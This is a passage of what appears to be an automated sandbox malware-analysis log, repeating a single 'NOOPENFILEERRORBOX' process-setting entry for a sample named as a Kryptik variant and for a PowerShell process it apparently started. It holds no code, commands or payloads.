                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
